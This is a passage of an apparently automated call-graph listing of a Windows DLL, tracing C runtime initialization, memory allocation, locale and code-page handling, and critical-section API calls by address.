19947->19892 19947->19895 19950 180025734 HeapSetInformation 19949->19950 19951 18001ffc9 19949->19951 19950->19951 19951->19906 19952 180023598 19951->19952 20083 180021220 19952->20083 19954 1800235a3 20088 180026d6c 19954->20088 19957 18002360c 19959 18002329c 48 API calls 19957->19959 19958 1800235ac FlsAlloc 19958->19957 19960 1800235c4 19958->19960 19961 180023611 19959->19961 19962 180024c8c _getptd 45 API calls 19960->19962 19961->19912 19963 1800235d3 19962->19963 19963->19957 19964 1800235db FlsSetValue 19963->19964 19964->19957 19965 1800235ee 19964->19965 19966 1800232c4 _getptd 45 API calls 19965->19966 19967 1800235f8 GetCurrentThreadId 19966->19967 19967->19961 19969 18002551b GetEnvironmentStringsW 19968->19969 19970 18002554d 19968->19970 19971 180025535 GetLastError 19969->19971 19972 180025529 19969->19972 19970->19972 19973 180025610 19970->19973 19971->19970 19975 18002555b GetEnvironmentStringsW 19972->19975 19979 180025570 WideCharToMultiByte 19972->19979 19974 18002561d GetEnvironmentStrings 19973->19974 19976 18001fffb 19973->19976 19974->19976 19978 18002562f 19974->19978 19975->19976 19975->19979 19993 180024d98 GetStartupInfoA 19976->19993 19978->19978 19983 180024c20 __setargv 45 API calls 19978->19983 19980 1800255ff 19979->19980 19981 1800255be 19979->19981 19982 180025602 FreeEnvironmentStringsW 19980->19982 20095 180024c20 19981->20095 19982->19976 19986 180025653 19983->19986 19988 18002565b FreeEnvironmentStringsA 19986->19988 19989 180025669 __initmbctable 19986->19989 19987 1800255ce WideCharToMultiByte 19987->19982 19990 1800255f7 19987->19990 19988->19976 19991 180025677 FreeEnvironmentStringsA 19989->19991 19992 180020300 free 45 API calls 19990->19992 19991->19976 19992->19980 19994 180024c8c _getptd 45 API calls 19993->19994 20000 180024dd5 19994->20000 19995 180024f9b 19996 180024fc1 GetStdHandle 19995->19996 19997 180024ff0 GetFileType 19995->19997 19999 180025050 SetHandleCount 19995->19999 20002 1800272a8 _lock InitializeCriticalSectionAndSpinCount 19995->20002 20005 180020007 19995->20005 19996->19995 19997->19995 19998 180024c8c _getptd 45 API calls 19998->20000 19999->20005 20000->19995 20000->19998 20003 180024f04 20000->20003 20000->20005 20001 180024f37 GetFileType 20001->20003 20002->19995 20003->19995 20003->20001 20004 1800272a8 _lock InitializeCriticalSectionAndSpinCount 20003->20004 20003->20005 20004->20003 20005->19938 20014 1800253f4 20005->20014 20007 1800232b8 20006->20007 20008 1800232ab FlsFree 20006->20008 20009 180026e49 20007->20009 20010 180026e2b DeleteCriticalSection 20007->20010 20008->20007 20012 180026e57 DeleteCriticalSection 20009->20012 20013 180026e66 20009->20013 20011 180020300 free 45 API calls 20010->20011 20011->20007 20012->20009 20013->19932 20015 180025411 GetModuleFileNameA 20014->20015 20016 18002540c 20014->20016 20018 180025443 20015->20018 20241 1800269b8 20016->20241 20245 180025224 20018->20245 20020 180020017 20020->19934 20025 1800250f4 20020->20025 20022 180024c20 __setargv 45 API calls 20023 180025497 20022->20023 20023->20020 20024 180025224 __setargv 45 API calls 20023->20024 20024->20020 20026 180025111 20025->20026 20029 180025116 malloc 20025->20029 20027 1800269b8 __initmbctable 83 API calls 20026->20027 20027->20029 20028 180020020 20028->19934 20040 180020fc8 20028->20040 20029->20028 20030 180024c8c _getptd 45 API calls 20029->20030 20037 180025155 malloc 20030->20037 20031 1800251ce 20032 180020300 free 45 API calls 20031->20032 20032->20028 20033 180024c8c _getptd 45 API calls 20033->20037 20034 18002520a 20035 180020300 free 45 API calls 20034->20035 20035->20028 20036 180021288 malloc 45 API calls 20036->20037 20037->20028 20037->20031 20037->20033 20037->20034 20037->20036 20038 1800251aa 20037->20038 20039 180021708 malloc 6 API calls 20038->20039 20039->20037 20041 180020fde _cinit 20040->20041 20655 180026fc0 20041->20655 20048 180021041 _cinit 20048->19934 20051 180024cb1 20050->20051 20053 180020097 20051->20053 20054 180024ccf Sleep 20051->20054 20877 18002838c 20051->20877 20053->19906 20053->19917 20054->20051 20054->20053 20055->19906 20060 180025099 20056->20060 20057 1800250e8 20057->19938 20058 180020300 free 45 API calls 20058->20060 20059 1800250b0 DeleteCriticalSection 20059->20060 20060->20057 20060->20058 20060->20059 20061->19906 20063 180026f7c _lock 45 API calls 20062->20063 20064 180023319 20063->20064 20886 180026e7c LeaveCriticalSection 20064->20886 20072 180020305 HeapFree 20071->20072 20076 180020335 free 20071->20076 20073 180020320 20072->20073 20072->20076 20074 180020618 _errno 43 API calls 20073->20074 20075 180020325 GetLastError 20074->20075 20075->20076 20076->19906 20078 18002356c 20077->20078 20079 180023590 20077->20079 20080 180023571 FlsGetValue 20078->20080 20081 180023580 FlsSetValue 20078->20081 20079->19906 20080->20081 20887 180023420 20081->20887 20092 180023288 EncodePointer 20083->20092 20085 18002122b _initp_misc_winsig 20086 180024ab8 EncodePointer 20085->20086 20087 18002126e EncodePointer 20086->20087 20087->19954 20089 180026d8f 20088->20089 20091 1800235a8 20089->20091 20093 1800272a8 InitializeCriticalSectionAndSpinCount 20089->20093 20091->19957 20091->19958 20094 1800272d5 20093->20094 20094->20089 20096 180024c3c 20095->20096 20098 180024c74 20096->20098 20099 180024c54 Sleep 20096->20099 20100 180020248 20096->20100 20098->19980 20098->19987 20099->20096 20099->20098 20101 1800202dc malloc 20100->20101 20112 180020260 malloc 20100->20112 20105 180020618 _errno 44 API calls 20101->20105 20102 180020298 RtlAllocateHeap 20106 1800202d1 20102->20106 20102->20112 20103 180020278 20103->20102 20114 180025c48 20103->20114 20123 180025a20 20103->20123 20156 180020f28 20103->20156 20105->20106 20106->20096 20107 1800202c1 20159 180020618 20107->20159 20110 1800202c6 20113 180020618 _errno 44 API calls 20110->20113 20112->20102 20112->20103 20112->20107 20112->20110 20113->20106 20162 1800297f8 20114->20162 20117 1800297f8 _FF_MSGBANNER 45 API calls 20119 180025c65 20117->20119 20118 180025a20 malloc 45 API calls 20120 180025c7c 20118->20120 20119->20118 20121 180025c86 20119->20121 20122 180025a20 malloc 45 API calls 20120->20122 20121->20103 20122->20121 20124 180025a43 20123->20124 20125 1800297f8 _FF_MSGBANNER 42 API calls 20124->20125 20155 180025be8 20124->20155 20126 180025a65 20125->20126 20127 180025bea GetStdHandle 20126->20127 20128 1800297f8 _FF_MSGBANNER 42 API calls 20126->20128 20129 180025bfd malloc 20127->20129 20127->20155 20130 180025a78 20128->20130 20132 180025c13 WriteFile 20129->20132 20129->20155 20130->20127 20131 180025a89 20130->20131 20131->20155 20181 180021288 20131->20181 20132->20155 20135 180025acd GetModuleFileNameA 20137 180025aed 20135->20137 20140 180025b1e malloc 20135->20140 20136 180021708 malloc 6 API calls 20136->20135 20138 180021288 malloc 42 API calls 20137->20138 20139 180025b05 20138->20139 20139->20140 20142 180021708 malloc 6 API calls 20139->20142 20141 180025b79 20140->20141 20190 1800208a4 20140->20190 20199 1800212fc 20141->20199 20142->20140 20146 180025ba4 20147 1800212fc malloc 42 API calls 20146->20147 20151 180025bba 20147->20151 20149 180021708 malloc 6 API calls 20149->20146 20150 180025bd3 20208 180029604 20150->20208 20151->20150 20153 180021708 malloc 6 API calls 20151->20153 20152 180021708 malloc 6 API calls 20152->20141 20153->20150 20155->20103 20226 180020eec GetModuleHandleW 20156->20226 20229 180023378 GetLastError FlsGetValue 20159->20229 20161 180020621 20161->20110 20163 180029800 20162->20163 20164 180020618 _errno 45 API calls 20163->20164 20165 180025c56 20163->20165 20166 180029825 20164->20166 20165->20117 20165->20119 20168 180021830 DecodePointer 20166->20168 20169 180021861 20168->20169 20170 18002187b _RunAllParam 20168->20170 20169->20165 20172 180021708 20170->20172 20179 18001fd80 20172->20179 20175 180021765 20176 1800217c5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20175->20176 20177 180021804 _RunAllParam 20176->20177 20178 180021810 GetCurrentProcess TerminateProcess 20176->20178 20177->20178 20178->20169 20180 18001fd89 RtlCaptureContext 20179->20180 20180->20175 20182 180021293 20181->20182 20184 18002129d 20181->20184 20182->20184 20187 1800212c9 20182->20187 20183 180020618 _errno 45 API calls 20185 1800212a5 20183->20185 20184->20183 20186 180021830 _FF_MSGBANNER 7 API calls 20185->20186 20188 1800212c1 20186->20188 20187->20188 20189 180020618 _errno 45 API calls 20187->20189 20188->20135 20188->20136 20189->20185 20193 1800208b2 20190->20193 20191 1800208b7 20192 180020618 _errno 45 API calls 20191->20192 20194 1800208bc 20191->20194 20198 1800208e1 20192->20198 20193->20191 20193->20194 20196 180020905 20193->20196 20194->20141 20194->20152 20195 180021830 _FF_MSGBANNER 7 API calls 20195->20194 20196->20194 20197 180020618 _errno 45 API calls 20196->20197 20197->20198 20198->20195 20201 18002130a 20199->20201 20203 180021314 20199->20203 20200 180020618 _errno 45 API calls 20207 18002131c 20200->20207 20201->20203 20204 180021358 20201->20204 20202 180021830 _FF_MSGBANNER 7 API calls 20205 180021338 20202->20205 20203->20200 20204->20205 20206 180020618 _errno 45 API calls 20204->20206 20205->20146 20205->20149 20206->20207 20207->20202 20225 180023288 EncodePointer 20208->20225 20227 180020f06 GetProcAddress 20226->20227 20228 180020f1b ExitProcess 20226->20228 20227->20228 20230 1800233e6 SetLastError 20229->20230 20231 18002339e 20229->20231 20230->20161 20232 180024c8c _getptd 40 API calls 20231->20232 20233 1800233ab 20232->20233 20233->20230 20234 1800233b3 FlsSetValue 20233->20234 20235 1800233c9 20234->20235 20236 1800233df 20234->20236 20237 1800232c4 _getptd 40 API calls 20235->20237 20238 180020300 free 40 API calls 20236->20238 20239 1800233d0 GetCurrentThreadId 20237->20239 20240 1800233e4 20238->20240 20239->20230 20240->20230 20242 1800269c5 20241->20242 20244 1800269cf 20241->20244 20251 1800267c0 20242->20251 20244->20015 20247 180025263 20245->20247 20250 1800252cb 20247->20250 20651 180021678 20247->20651 20248 1800253c7 20248->20020 20248->20022 20249 180021678 __setargv 45 API calls 20249->20250 20250->20248 20250->20249 20275 1800233fc 20251->20275 20258 180024c20 __setargv 45 API calls 20259 180026810 __initmbctable 20258->20259 20268 18002696d 20259->20268 20298 180026548 20259->20298 20262 18002684b 20267 180020300 free 45 API calls 20262->20267 20269 180026870 20262->20269 20263 18002696f 20264 180026988 20263->20264 20265 180020300 free 45 API calls 20263->20265 20263->20268 20266 180020618 _errno 45 API calls 20264->20266 20265->20264 20266->20268 20267->20269 20268->20244 20269->20268 20308 180026f7c 20269->20308 20276 180023378 _getptd 45 API calls 20275->20276 20277 180023407 20276->20277 20278 180023417 20277->20278 20314 180020ebc 20277->20314 20280 1800263fc 20278->20280 20281 1800233fc _getptd 45 API calls 20280->20281 20282 18002640b 20281->20282 20283 180026426 20282->20283 20284 180026f7c _lock 45 API calls 20282->20284 20285 1800264aa 20283->20285 20288 180020ebc _getptd 45 API calls 20283->20288 20289 180026439 20284->20289 20291 1800264b8 20285->20291 20286 180026470 20319 180026e7c LeaveCriticalSection 20286->20319 20288->20285 20289->20286 20290 180020300 free 45 API calls 20289->20290 20290->20286 20320 1800206d8 20291->20320 20294 1800264d8 GetOEMCP 20297 1800264e8 20294->20297 20295 1800264fd 20296 180026502 GetACP 20295->20296 20295->20297 20296->20297 20297->20258 20297->20268 20299 1800264b8 __initmbctable 47 API calls 20298->20299 20300 18002656f 20299->20300 20301 180026577 __initmbctable 20300->20301 20302 1800265c8 IsValidCodePage 20300->20302 20307 1800265ee shared_ptr 20300->20307 20497 18001fbe0 20301->20497 20302->20301 20304 1800265d9 GetCPInfo 20302->20304 20304->20301 20304->20307 20305 1800267ab 20305->20262 20305->20263 20487 180026218 GetCPInfo 20307->20487 20309 180026fab EnterCriticalSection 20308->20309 20310 180026f9a 20308->20310 20625 180026e94 20310->20625 20313 180020ebc _getptd 44 API calls 20313->20309 20315 180025c48 _FF_MSGBANNER 44 API calls 20314->20315 20316 180020ec9 20315->20316 20317 180025a20 malloc 44 API calls 20316->20317 20318 180020ed0 DecodePointer 20317->20318 20321 1800206ee 20320->20321 20326 180020752 20320->20326 20322 1800233fc _getptd 45 API calls 20321->20322 20323 1800206f3 20322->20323 20325 18002072b 20323->20325 20328 180026cf4 20323->20328 20325->20326 20327 1800263fc __initmbctable 45 API calls 20325->20327 20326->20294 20326->20295 20327->20326 20329 1800233fc _getptd 45 API calls 20328->20329 20330 180026cff 20329->20330 20331 180026d28 20330->20331 20332 180026d1a 20330->20332 20333 180026f7c _lock 45 API calls 20331->20333 20334 1800233fc _getptd 45 API calls 20332->20334 20335 180026d32 20333->20335 20336 180026d1f 20334->20336 20342 180026c9c 20335->20342 20340 180026d60 20336->20340 20341 180020ebc _getptd 45 API calls 20336->20341 20340->20325 20341->20340 20343 180026ce6 20342->20343 20344 180026caa __initmbctable _getptd 20342->20344 20346 180026e7c LeaveCriticalSection 20343->20346 20344->20343 20347 1800269e0 20344->20347 20348 180026a77 20347->20348 20350 1800269fe 20347->20350 20349 180026aca 20348->20349 20351 180020300 free 45 API calls 20348->20351 20361 180026af7 20349->20361 20399 18002a314 20349->20399 20350->20348 20360 180020300 free 45 API calls 20350->20360 20363 180026a3d 20350->20363 20353 180026a9b 20351->20353 20355 180020300 free 45 API calls 20353->20355 20362 180026aaf 20355->20362 20356 180026a5f 20358 180020300 free 45 API calls 20356->20358 20357 180026b43 20364 180026a6b 20358->20364 20359 180020300 free 45 API calls 20359->20361 20365 180026a31 20360->20365 20361->20357 20366 180020300 45 API calls free 20361->20366 20367 180020300 free 45 API calls 20362->20367 20363->20356 20368 180020300 free 45 API calls 20363->20368 20369 180020300 free 45 API calls 20364->20369 20375 18002a548 20365->20375 20366->20361 20371 180026abe 20367->20371 20372 180026a53 20368->20372 20369->20348 20374 180020300 free 45 API calls 20371->20374 20391 18002a500 20372->20391 20374->20349 20376 18002a551 20375->20376 20388 18002a5d7 20375->20388 20377 18002a56b 20376->20377 20378 180020300 free 45 API calls 20376->20378 20379 180020300 free 45 API calls 20377->20379 20380 18002a57d 20377->20380 20378->20377 20379->20380 20381 18002a58f 20380->20381 20382 180020300 free 45 API calls 20380->20382 20383 18002a5a1 20381->20383 20384 180020300 free 45 API calls 20381->20384 20382->20381 20385 18002a5b3 20383->20385 20386 180020300 free 45 API calls 20383->20386 20384->20383 20387 18002a5c5 20385->20387 20389 180020300 free 45 API calls 20385->20389 20386->20385 20387->20388 20390 180020300 free 45 API calls 20387->20390 20388->20363 20389->20387 20390->20388 20392 18002a542 20391->20392 20393 18002a505 20391->20393 20392->20356 20394 18002a51e 20393->20394 20395 180020300 free 45 API calls 20393->20395 20396 18002a530 20394->20396 20397 180020300 free 45 API calls 20394->20397 20395->20394 20396->20392 20398 180020300 free 45 API calls 20396->20398 20397->20396 20398->20392 20400 180026aeb 20399->20400 20401 18002a31d 20399->20401 20400->20359 20402 180020300 free 45 API calls 20401->20402 20403 18002a32e 20402->20403 20404 180020300 free 45 API calls 20403->20404 20405 18002a337 20404->20405 20406 180020300 free 45 API calls 20405->20406 20407 18002a340 20406->20407 20408 180020300 free 45 API calls 20407->20408 20409 18002a349 20408->20409 20410 180020300 free 45 API calls 20409->20410 20411 18002a352 20410->20411 20412 180020300 free 45 API calls 20411->20412 20413 18002a35b 20412->20413 20414 180020300 free 45 API calls 20413->20414 20415 18002a363 20414->20415 20416 180020300 free 45 API calls 20415->20416 20417 18002a36c 20416->20417 20418 180020300 free 45 API calls 20417->20418 20419 18002a375 20418->20419 20420 180020300 free 45 API calls 20419->20420 20421 18002a37e 20420->20421 20422 180020300 free 45 API calls 20421->20422 20423 18002a387 20422->20423 20424 180020300 free 45 API calls 20423->20424 20425 18002a390 20424->20425 20426 180020300 free 45 API calls 20425->20426 20427 18002a399 20426->20427 20428 180020300 free 45 API calls 20427->20428 20429 18002a3a2 20428->20429 20430 180020300 free 45 API calls 20429->20430 20431 18002a3ab 20430->20431 20432 180020300 free 45 API calls 20431->20432 20433 18002a3b4 20432->20433 20434 180020300 free 45 API calls 20433->20434 20435 18002a3c0 20434->20435 20436 180020300 free 45 API calls 20435->20436 20437 18002a3cc 20436->20437 20438 180020300 free 45 API calls 20437->20438 20439 18002a3d8 20438->20439 20440 180020300 free 45 API calls 20439->20440 20441 18002a3e4 20440->20441 20442 180020300 free 45 API calls 20441->20442 20443 18002a3f0 20442->20443 20444 180020300 free 45 API calls 20443->20444 20445 18002a3fc 20444->20445 20446 180020300 free 45 API calls 20445->20446 20447 18002a408 20446->20447 20448 180020300 free 45 API calls 20447->20448 20449 18002a414 20448->20449 20450 180020300 free 45 API calls 20449->20450 20451 18002a420 20450->20451 20452 180020300 free 45 API calls 20451->20452 20453 18002a42c 20452->20453 20454 180020300 free 45 API calls 20453->20454 20455 18002a438 20454->20455 20456 180020300 free 45 API calls 20455->20456 20457 18002a444 20456->20457 20458 180020300 free 45 API calls 20457->20458 20459 18002a450 20458->20459 20460 180020300 free 45 API calls 20459->20460 20461 18002a45c 20460->20461 20462 180020300 free 45 API calls 20461->20462 20463 18002a468 20462->20463 20464 180020300 free 45 API calls 20463->20464 20465 18002a474 20464->20465 20466 180020300 free 45 API calls 20465->20466 20467 18002a480 20466->20467 20468 180020300 free 45 API calls 20467->20468 20469 18002a48c 20468->20469 20470 180020300 free 45 API calls 20469->20470 20471 18002a498 20470->20471 20472 180020300 free 45 API calls 20471->20472 20473 18002a4a4 20472->20473 20474 180020300 free 45 API calls 20473->20474 20475 18002a4b0 20474->20475 20476 180020300 free 45 API calls 20475->20476 20477 18002a4bc 20476->20477 20478 180020300 free 45 API calls 20477->20478 20479 18002a4c8 20478->20479 20480 180020300 free 45 API calls 20479->20480 20481 18002a4d4 20480->20481 20482 180020300 free 45 API calls 20481->20482 20483 18002a4e0 20482->20483 20484 180020300 free 45 API calls 20483->20484 20485 18002a4ec 20484->20485 20486 180020300 free 45 API calls 20485->20486 20486->20400 20488 18002625a shared_ptr 20487->20488 20489 180026346 20487->20489 20508 18002a288 20488->20508 20492 18001fbe0 _RunAllParam 8 API calls 20489->20492 20494 1800263e6 20492->20494 20494->20301 20496 180029f84 __initmbctable 78 API calls 20496->20489 20498 18001fbe9 20497->20498 20499 18001fbf4 20498->20499 20500 180024ad4 RtlCaptureContext RtlLookupFunctionEntry 20498->20500 20499->20305 20501 180024b18 RtlVirtualUnwind 20500->20501 20502 180024b59 20500->20502 20503 180024b7b IsDebuggerPresent 20501->20503 20502->20503 20624 18002843c 20503->20624 20505 180024bda SetUnhandledExceptionFilter UnhandledExceptionFilter 20506 180024c02 GetCurrentProcess TerminateProcess 20505->20506 20507 180024bf8 _RunAllParam 20505->20507 20506->20305 20507->20506 20509 1800206d8 __initmbctable 45 API calls 20508->20509 20510 18002a2ac 20509->20510 20518 18002a01c 20510->20518 20513 180029f84 20514 1800206d8 __initmbctable 45 API calls 20513->20514 20515 180029fa8 20514->20515 20577 180029a44 20515->20577 20519 18002a06c GetStringTypeW 20518->20519 20520 18002a0a9 20518->20520 20521 18002a086 20519->20521 20522 18002a08e GetLastError 20519->20522 20520->20521 20523 18002a1d8 20520->20523 20524 18002a0d2 MultiByteToWideChar 20521->20524 20539 18002a1d1 20521->20539 20522->20520 20542 18002b35c GetLocaleInfoA 20523->20542 20530 18002a100 20524->20530 20524->20539 20526 18001fbe0 _RunAllParam 8 API calls 20528 1800262dd 20526->20528 20528->20513 20529 18002a233 GetStringTypeA 20531 18002a256 20529->20531 20529->20539 20532 180020248 malloc 45 API calls 20530->20532 20534 18002a125 shared_ptr _flush 20530->20534 20535 180020300 free 45 API calls 20531->20535 20532->20534 20536 18002a18c MultiByteToWideChar 20534->20536 20534->20539 20535->20539 20538 18002a1ae GetStringTypeW 20536->20538 20540 18002a1c3 20536->20540 20538->20540 20539->20526 20540->20539 20541 180020300 free 45 API calls 20540->20541 20541->20539 20543 18002b393 20542->20543 20544 18002b38e 20542->20544 20573 180021548 20543->20573 20546 18001fbe0 _RunAllParam 8 API calls 20544->20546 20547 18002a202 20546->20547 20547->20529 20547->20539 20548 18002b3b0 20547->20548 20549 18002b402 GetCPInfo 20548->20549 20550 18002b4da 20548->20550 20551 18002b4b3 MultiByteToWideChar 20549->20551 20552 18002b414 20549->20552 20553 18001fbe0 _RunAllParam 8 API calls 20550->20553 20551->20550 20557 18002b439 malloc 20551->20557 20552->20551 20554 18002b41e GetCPInfo 20552->20554 20555 18002a228 20553->20555 20554->20551 20556 18002b433 20554->20556 20555->20529 20555->20539 20556->20551 20556->20557 20558 180020248 malloc 45 API calls 20557->20558 20559 18002b475 shared_ptr _flush 20557->20559 20558->20559 20559->20550 20560 18002b511 MultiByteToWideChar 20559->20560 20561 18002b573 20560->20561 20562 18002b53b 20560->20562 20561->20550 20567 180020300 free 45 API calls 20561->20567 20563 18002b57b 20562->20563 20564 18002b540 WideCharToMultiByte 20562->20564 20565 18002b581 WideCharToMultiByte 20563->20565 20566 18002b5ad 20563->20566 20564->20561 20565->20561 20565->20566 20568 180024c8c _getptd 45 API calls 20566->20568 20567->20550 20569 18002b5ba 20568->20569 20569->20561 20570 18002b5c2 WideCharToMultiByte 20569->20570 20570->20561 20571 18002b5eb 20570->20571 20572 180020300 free 45 API calls 20571->20572 20572->20561 20574 180027564 20573->20574 20575 1800272e0 __initmbctable 67 API calls 20574->20575 20576 18002758f 20575->20576 20576->20544 20578 180029a9c LCMapStringW 20577->20578 20581 180029ac0 20577->20581 20579 180029acc GetLastError 20578->20579 20578->20581 20579->20581 20580 180029d8e 20585 18002b35c __initmbctable 67 API calls 20580->20585 20581->20580 20582 180029b3b 20581->20582 20583 180029d87 20582->20583 20584 180029b59 MultiByteToWideChar 20582->20584 20586 18001fbe0 _RunAllParam 8 API calls 20583->20586 20584->20583 20594 180029b88 20584->20594 20587 180029dbc 20585->20587 20588 180026310 20586->20588 20587->20583 20590 180029f17 LCMapStringA 20587->20590 20591 180029ddb 20587->20591 20588->20496 20589 180029c04 MultiByteToWideChar 20592 180029d79 20589->20592 20593 180029c2e LCMapStringW 20589->20593 20606 180029e23 20590->20606 20595 18002b3b0 __initmbctable 60 API calls 20591->20595 20592->20583 20602 180020300 free 45 API calls 20592->20602 20593->20592 20596 180029c58 20593->20596 20597 180029bb9 _flush 20594->20597 20598 180020248 malloc 45 API calls 20594->20598 20599 180029df3 20595->20599 20603 180029c63 20596->20603 20609 180029c9e 20596->20609 20597->20583 20597->20589 20598->20597 20599->20583 20600 180029dfb LCMapStringA 20599->20600 20600->20606 20611 180029e2a 20600->20611 20601 180029f47 20601->20583 20607 180020300 free 45 API calls 20601->20607 20602->20583 20603->20592 20605 180029c7a LCMapStringW 20603->20605 20604 180020300 free 45 API calls 20604->20601 20605->20592 20606->20601 20606->20604 20607->20583 20608 180029d0b LCMapStringW 20612 180029d6b 20608->20612 20613 180029d2c WideCharToMultiByte 20608->20613 20610 180020248 malloc 45 API calls 20609->20610 20617 180029cbc _flush 20609->20617 20610->20617 20615 180029e4b shared_ptr _flush 20611->20615 20616 180020248 malloc 45 API calls 20611->20616 20612->20592 20621 180020300 free 45 API calls 20612->20621 20613->20612 20614 180029ead LCMapStringA 20618 180029ed5 20614->20618 20619 180029ed9 20614->20619 20615->20606 20615->20614 20616->20615 20617->20592 20617->20608 20618->20606 20623 180020300 free 45 API calls 20618->20623 20622 18002b3b0 __initmbctable 60 API calls 20619->20622 20621->20592 20622->20618 20623->20606 20624->20505 20626 180026ed2 20625->20626 20627 180026ebb 20625->20627 20629 180024c20 __setargv 44 API calls 20626->20629 20639 180026ee7 20626->20639 20628 180025c48 _FF_MSGBANNER 44 API calls 20627->20628 20630 180026ec0 20628->20630 20631 180026ef5 20629->20631 20632 180025a20 malloc 44 API calls 20630->20632 20633 180026f0c 20631->20633 20634 180026efd 20631->20634 20635 180026ec8 20632->20635 20638 180026f7c _lock 44 API calls 20633->20638 20637 180020618 _errno 44 API calls 20634->20637 20636 180020f28 malloc 3 API calls 20635->20636 20636->20626 20637->20639 20640 180026f16 20638->20640 20639->20309 20639->20313 20641 180026f1f 20640->20641 20642 180026f4e 20640->20642 20644 1800272a8 _lock InitializeCriticalSectionAndSpinCount 20641->20644 20643 180020300 free 44 API calls 20642->20643 20645 180026f3d LeaveCriticalSection 20643->20645 20646 180026f2c 20644->20646 20645->20639 20646->20645 20648 180020300 free 44 API calls 20646->20648 20649 180026f38 20648->20649 20650 180020618 _errno 44 API calls 20649->20650 20650->20645 20652 1800215e4 20651->20652 20653 1800206d8 __initmbctable 45 API calls 20652->20653 20654 180021608 20653->20654 20654->20247 20656 180026fd6 EncodePointer 20655->20656 20656->20656 20657 180020ffb 20656->20657 20658 180020f8c 20657->20658 20659 180020fa3 20658->20659 20660 180020fba 20658->20660 20659->20660 20668 180028f74 20659->20668 20660->20048 20662 18001fd4c 20660->20662 20674 18001fc44 20662->20674 20664 18001fd55 20664->20048 20665 180030360 20664->20665 20690 180004540 20665->20690 20669 180028f89 20668->20669 20670 180024c8c _getptd 45 API calls 20669->20670 20671 180028fa8 20670->20671 20672 180024c8c _getptd 45 API calls 20671->20672 20673 180028fc5 20671->20673 20672->20673 20673->20659 20689 180020f40 20674->20689 20676 18001fc65 DecodePointer DecodePointer 20677 18001fc8d 20676->20677 20679 18001fd25 _cinit 20676->20679 20678 180021500 _cinit 46 API calls 20677->20678 20677->20679 20680 18001fca9 20678->20680 20679->20664 20681 18001fd05 EncodePointer EncodePointer 20680->20681 20682 18001fcd6 20680->20682 20683 18001fcc5 20680->20683 20681->20679 20682->20679 20685 18001fccd 20682->20685 20684 180024d10 _cinit 49 API calls 20683->20684 20684->20685 20685->20682 20686 18001fcee EncodePointer 20685->20686 20687 180024d10 _cinit 49 API calls 20685->20687 20686->20681 20688 18001fce9 20687->20688 20688->20679 20688->20686 20693 180017e84 20690->20693 20692 180004550 20709 1800186c8 20693->20709 20696 180017ec6 20722 18001aa78 20696->20722 20700 180017eef 20736 18001b63c 20700->20736 20704 180017f14 20706 180017f1f GetCurrentThread GetCurrentThreadId 20704->20706 20707 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20704->20707 20705 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20705->20704 20706->20692 20708 180017f1e 20707->20708 20708->20706 20753 180013904 20709->20753 20713 180017eac 20713->20696 20714 180021388 20713->20714 20715 18002139f malloc 20714->20715 20720 1800213e0 20714->20720 20716 180020248 malloc 45 API calls 20715->20716 20717 1800213b0 20716->20717 20718 180021288 malloc 45 API calls 20717->20718 20717->20720 20719 1800213c7 20718->20719 20719->20720 20721 180021708 malloc 6 API calls 20719->20721 20720->20696 20721->20720 20723 18001b63c _RunAllParam 73 API calls 20722->20723 20724 18001aa8f 20723->20724 20725 18001aa99 20724->20725 20727 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20724->20727 20726 180017edb 20725->20726 20764 18001b158 20725->20764 20726->20700 20731 18000bcd8 20726->20731 20727->20725 20730 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20730->20726 20783 180020530 20731->20783 20733 18000bcf9 20786 18001b08c LocalAlloc 20733->20786 20735 18000bd13 Concurrency::details::ExternalContextBase::~ExternalContextBase 20735->20700 20737 18001b667 20736->20737 20738 18001b66c 20736->20738 20739 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20737->20739 20750 18001b6b5 20738->20750 20752 18001b6a1 20738->20752 20812 18001b20c TlsAlloc 20738->20812 20739->20738 20744 180017f03 20744->20704 20744->20705 20745 18001b6cc 20824 18001b48c EnterCriticalSection 20745->20824 20746 18001b68f 20749 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20746->20749 20746->20752 20747 18001b6aa 20748 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20747->20748 20747->20750 20748->20750 20749->20752 20817 18001b0c4 EnterCriticalSection 20750->20817 20793 18001b25c EnterCriticalSection 20752->20793 20754 18001aa78 _RunAllParam 79 API calls 20753->20754 20755 180013912 20754->20755 20756 1800182c4 20755->20756 20759 18001a244 20756->20759 20760 18001b63c _RunAllParam 73 API calls 20759->20760 20761 18001a25b 20760->20761 20762 1800182e5 GetCursorPos 20761->20762 20763 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20761->20763 20762->20713 20763->20762 20765 18001aab6 20764->20765 20766 18001b17a 20764->20766 20765->20726 20765->20730 20770 18001bc74 20766->20770 20771 18001bc86 20770->20771 20776 18001bc8b 20770->20776 20772 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20771->20772 20772->20776 20773 18001bc9a 20774 18001bce8 EnterCriticalSection 20773->20774 20775 18001bcab EnterCriticalSection 20773->20775 20778 18001bcc2 InitializeCriticalSection 20775->20778 20779 18001bcdb LeaveCriticalSection 20775->20779 20776->20773 20780 18001bc44 20776->20780 20778->20779 20779->20774 20781 18001bc52 InitializeCriticalSection 20780->20781 20782 18001bc6f 20780->20782 20781->20782 20782->20773 20784 180020557 __initmbctable 20783->20784 20785 18002059e RaiseException 20784->20785 20785->20733 20787 18001b0a3 20786->20787 20788 18001b0a8 20786->20788 20790 18000bc90 20787->20790 20788->20735 20791 180020530 __SehTransFilter RaiseException 20790->20791 20792 18000bcb1 20791->20792 20794 18001b28e 20793->20794 20795 18001b3a2 shared_ptr 20794->20795 20797 18001b30a GlobalHandle GlobalUnlock 20794->20797 20798 18001b2df 20794->20798 20796 18001b3b5 LeaveCriticalSection 20795->20796 20796->20747 20799 18001b338 GlobalReAlloc 20797->20799 20800 18001b32d 20797->20800 20801 18001b2fb GlobalAlloc 20798->20801 20847 18000101c 20798->20847 20803 18001b34a 20799->20803 20802 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20800->20802 20801->20803 20805 